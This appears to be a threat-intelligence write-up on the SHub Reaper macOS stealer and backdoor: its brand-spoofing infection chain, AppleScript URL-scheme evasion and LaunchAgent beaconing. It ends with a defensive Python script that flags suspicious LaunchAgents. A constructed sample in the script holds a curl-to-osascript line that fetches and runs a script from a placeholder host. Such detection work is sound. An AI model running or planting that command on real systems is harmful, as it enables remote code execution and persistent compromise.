
Stealer Spoofs Google, Microsoft & Apple, Then Backdoors macOS
Why It Matters
Enterprises must revise macOS detection rules because traditional terminal‑centric alerts miss this multi‑stage, brand‑spoofing attack, increasing risk of credential leakage and lateral movement.
Key Takeaways
- SHub Reaper merges stealer theft with a persistent backdoor on macOS.
- Impersonates Apple, Google, and Microsoft across three infection stages.
- Uses the AppleScript URL scheme to evade Tahoe 26.4 protections.
- Detectable signs: Script Editor launches, osascript‑curl chains, unusual LaunchAgents.
Pulse Analysis
macOS‑focused threat actors have long relied on simple click‑fix tricks to harvest credentials, but the emergence of SHub Reaper signals a new level of sophistication. By coupling classic infostealer functions—credential harvesting, crypto‑wallet hijacking, and document exfiltration—with a lightweight backdoor, the malware turns a quick‑grab operation into a persistent foothold. This hybrid design reflects a broader trend in which attackers seek long‑term value from a single infection, leveraging the high‑value enterprise credentials often stored on Apple devices.
The infection chain is notable for its multibrand spoofing. Victims encounter fake WeChat and Miro installers hosted on typosquatted Microsoft domains, then see the payload masquerade as an Apple security update before persisting in a faux Google Software Update folder. Crucially, SHub Reaper sidesteps Apple’s Tahoe 26.4 mitigation by invoking the applescript:// URL scheme, loading malicious AppleScript directly in Script Editor. This living‑off‑the‑land technique avoids introducing foreign binaries, evading XProtect and many endpoint scanners while establishing a LaunchAgent that beacons every 60 seconds for command execution.
For security teams, the shift demands new detection lenses. Traditional alerts focused on terminal commands or suspicious binaries will miss the subtle Script Editor launches, osascript‑curl chains, and unusual LaunchAgent naming patterns. Organizations should enrich EDR policies to flag AppleScript URL handlers, monitor for unexpected invocations of Script Editor, and audit Google‑style update directories for rogue files. As macOS continues to gain market share in enterprise environments, adapting defenses to these layered, brand‑spoofing tactics will be essential to protect credentials and prevent lateral movement across corporate networks.
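One way to act on the LaunchAgent guidance above is to triage the plists in a user's LaunchAgents folder for the traits the analysis names: osascript invocations, osascript‑curl chains, a 60‑second beacon interval, and a Google‑branded label fronted by a script interpreter instead of a Google binary. The following is an added example, not the vendor's detection logic; the heuristics, interpreter list, and sample plists are constructed for illustration.

```python
# Added triage example: parse macOS LaunchAgent plists and flag the traits the
# analysis above describes (osascript/curl chains, 60 s beaconing, Google-branded
# persistence). Heuristics and sample data are constructed, not vendor detections.
import plistlib
from pathlib import Path
from typing import Dict, List

# Interpreters a LaunchAgent should rarely front, as opposed to a signed app binary.
INTERPRETERS = {"osascript", "sh", "bash", "zsh", "curl", "python3"}

def assess_agent(agent: Dict) -> List[str]:
    """Return the suspicious traits found in one parsed LaunchAgent dictionary."""
    label = str(agent.get("Label", "")).lower()
    args = agent.get("ProgramArguments") or [agent.get("Program", "")]
    cmdline = " ".join(str(a) for a in args)
    first = Path(str(args[0])).name.lower()
    findings: List[str] = []
    if "osascript" in cmdline:
        findings.append("runs AppleScript via osascript")
    if "osascript" in cmdline and "curl" in cmdline:
        findings.append("osascript-curl chain: script fetched from the network")
    interval = agent.get("StartInterval")
    if isinstance(interval, int) and interval <= 60 and first in INTERPRETERS:
        findings.append(f"interpreter re-run every {interval}s (beacon-like)")
    if "google" in label and first in INTERPRETERS:
        findings.append("Google-branded label backed by an interpreter, not a Google binary")
    return findings

def scan_launchagents(directory: Path) -> Dict[str, List[str]]:
    """Parse every .plist in `directory` and report only agents with findings."""
    report: Dict[str, List[str]] = {}
    if not directory.is_dir():
        return report
    for path in sorted(directory.glob("*.plist")):
        try:
            agent = plistlib.loads(path.read_bytes())
        except Exception as exc:  # a malformed plist is itself worth a look
            report[path.name] = [f"unparseable plist: {exc}"]
            continue
        if findings := assess_agent(agent):
            report[path.name] = findings
    return report

# Constructed samples: one mimicking the described persistence, one benign.
SUSPICIOUS_AGENT = {"Label": "com.google.keystone.agent", "StartInterval": 60,
    "ProgramArguments": ["/bin/sh", "-c", "curl -s https://updates.example.invalid/u.scpt | osascript"]}
BENIGN_AGENT = {"Label": "com.example.backup", "StartInterval": 3600,
    "ProgramArguments": ["/Applications/Backup.app/Contents/MacOS/backup", "--sync"]}
```

Run `scan_launchagents(Path.home() / "Library" / "LaunchAgents")` on an endpoint to get a per‑file list of findings; agents with no findings are omitted from the report.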